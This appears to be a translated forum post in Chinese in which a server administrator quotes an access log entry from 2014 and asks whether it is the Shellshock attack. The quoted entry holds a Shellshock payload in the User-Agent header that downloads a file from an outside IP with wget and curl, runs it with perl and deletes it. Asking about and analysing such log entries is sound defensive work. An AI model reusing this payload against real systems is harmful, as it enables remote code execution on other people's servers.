access.log在我的测试服务器上看到了这个:
> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Run Code Online (Sandbox Code Playgroud)
没有一个地址与我或我们的 IP 范围(或其他任何与此相关的内容)有关 立即考虑Shellshock 安全漏洞/“bashdoor”。
实际上看起来有人试图将curl“某事”下放到服务器,然后执行该“某事”,然后使用-rf.
这是一个纯粹的测试服务器,没有任何伤害(==除了重新安装之外没有任何伤害) - 但时机非常有趣。据我回忆,以前从未见过这样的事情。
我应该担心,例如“感兴趣”吗?有没有人知道这是什么?